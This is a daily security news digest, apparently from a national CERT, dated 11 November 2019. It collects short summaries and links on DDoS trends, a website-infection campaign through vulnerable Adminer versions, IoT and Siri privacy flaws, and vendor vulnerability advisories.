Tageszusammenfassung - 11.11.2019

End-of-Day report

Timeframe: Freitag 08-11-2019 18:00 - Montag 11-11-2019 18:00 Handler: Robert Waldner Co-Handler: n/a

News

DDoS attacks in Q3 2019

Statistically, Q3 2019 differs little from Q2. In terms of geographical distribution of attacks and targets, we saw a continuation of the now familiar trend of unexpected guests appearing, only to drop out the next quarter.

https://securelist.com/ddos-report-q3-2019/94958/


Vulnerable Versions of Adminer as a Universal Infection Vector

This past week, we-ve been monitoring a new wave of website infections mostly impacting WordPress and Magento websites. We found that hackers have been injecting scripts from scripts.trasnaltemyrecords[.]com into multiple files and database tables. This is still the same ongoing campaign that we-ve been following for the past few years, where site visitors are redirected to various kinds of scam landing pages-including tech support scams, fake lottery wins, and malicious [...]

https://blog.sucuri.net/2019/11/vulnerable-versions-of-adminer-as-a-universal-infection-vector.html


Ring Video Doorbell Pro: Mitteilsame IoT-Türklingel verriet WLAN-Zugangsdaten

Eine Klingel, die Besucher sicht- und hörbar macht, hätte Angreifern unbemerkt vollen WLAN-Zugriff verschaffen können. Automatische Updates wurden verteilt.

https://heise.de/-4583764


Sofortübersetzer von Muama Enence hält nicht, was er verspricht

Ein Gerät, das 32 Sprachen unmittelbar übersetzt und Verständigungsprobleme im Urlaub oder bei Geschäftstätigkeiten beseitigt, klingt erstmal hervorragend! Dies verspricht die UAB Ekomlita mit dem MUAMA Enence Instant Translator. Doch Vorsicht: Hier werden mitunter wichtige Informationen zum Produkt verheimlicht, es kommt zu groben Problemen beim Rücktritt und wir hegen Bedenken zum Datenschutz!

https://www.watchlist-internet.at/news/sofortuebersetzer-von-muama-enence-haelt-nicht-was-er-verspricht/


Apples Siri unterwandert E-Mail-Verschlüsselung

Nachrichten werden unter macOS im Klartext lokal gespeichert - Fehlerbereinigung laut Apple in Arbeit

https://www.derstandard.at/story/2000110928043/apples-siri-unterwandert-e-mail-verschluesselung

Vulnerabilities

Jira Service Desk Security Advisory 2019-11-06

CVE-2019-15003 - Authorization bypass allows information disclosure CVE-2019-15004 - URL path traversal allows information disclosure

https://confluence.atlassian.com/jira/jira-service-desk-security-advisory-2019-11-06-979412717.html


UniFi Video Server Privilege Escalation From user to SYSTEM via unauthenticated command execution

The vulnerability, or feature depending how you look at it, is the ability to execute commands using the evostream API interface that is exposed on localhost:7440.

https://hackerone.com/reports/544928


Security updates for Monday

Security updates have been issued by Debian (ampache, chromium, djvulibre, firefox-esr, gdal, and ruby-haml), Fedora (chromium, file, gd, hostapd, nspr, and rssh), openSUSE (bcm20702a1-firmware, firefox, gdal, libtomcrypt, php7, python-ecdsa, python3, samba, and thunderbird), SUSE (apache2-mod_auth_openidc, libssh2_org, and rsyslog), and Ubuntu (bash).

https://lwn.net/Articles/804325/


Security Bulletin: IBM QRadar SIEM is vulnerable to multiple Kernel vulnerabilities

https://www.ibm.com/blogs/psirt/security-bulletin-ibm-qradar-siem-is-vulnerable-to-multiple-kernel-vulnerabilities/


Security Bulletin: IBM RackSwitch firmware products are affected by TCP denial of service vulnarabilities

https://www.ibm.com/blogs/psirt/security-bulletin-ibm-rackswitch-firmware-products-are-affected-by-tcp-denial-of-service-vulnarabilities/


Security Bulletin: IBM Tivoli Netcool Impact is affected by an Apache Camel vulnerability (CVE-2019-0188)

https://www.ibm.com/blogs/psirt/security-bulletin-ibm-tivoli-netcool-impact-is-affected-by-an-apache-camel-vulnerability-cve-2019-0188/


Security Bulletin: Node.js lodash vulnerability affects IBM Spectrum Control (formerly Tivoli Storage Productivity Center) ( CVE-2019-10744)

https://www.ibm.com/blogs/psirt/security-bulletin-node-js-lodash-vulnerability-affects-ibm-spectrum-control-formerly-tivoli-storage-productivity-center-cve-2019-10744/


Security Bulletin: IBM Flex System Chassis Management Module (CMM) is affected by vulnerability in SQLite (CVE-2018-20346)

https://www.ibm.com/blogs/psirt/security-bulletin-ibm-flex-system-chassis-management-module-cmm-is-affected-by-vulnerability-in-sqlite-cve-2018-20346/


Security Bulletin: IBM QRadar SIEM is vulnerable to Jetty Vulnerabilities (CVE-2017-7656, CVE-2017-7657, CVE-2017-7658, CVE-2018-12536)

https://www.ibm.com/blogs/psirt/security-bulletin-ibm-qradar-siem-is-vulnerable-to-jetty-vulnerabilities-cve-2017-7656-cve-2017-7657-cve-2017-7658-cve-2018-12536/


Security Bulletin: IBM Tivoli Netcool Impact is affected by an Apache Camel vulnerability (CVE-2019-0194)

https://www.ibm.com/blogs/psirt/security-bulletin-ibm-tivoli-netcool-impact-is-affected-by-an-apache-camel-vulnerability-cve-2019-0194/


Security Bulletin: IBM QRadar SIEM is vulnerable to cross site scripting (XSS) (CVE-2019-4470)

https://www.ibm.com/blogs/psirt/security-bulletin-ibm-qradar-siem-is-vulnerable-to-cross-site-scripting-xss-cve-2019-4470/


Security Bulletin: Multiple vulnerabilities in Python affect IBM i

https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-python-affect-ibm-i/


Security Bulletin: IBM QRadar SIEM is vulnerable to Intel Microarchitectural Data Sampling (MDS) Vulnerabilites

https://www.ibm.com/blogs/psirt/security-bulletin-ibm-qradar-siem-is-vulnerable-to-intel-microarchitectural-data-sampling-mds-vulnerabilites/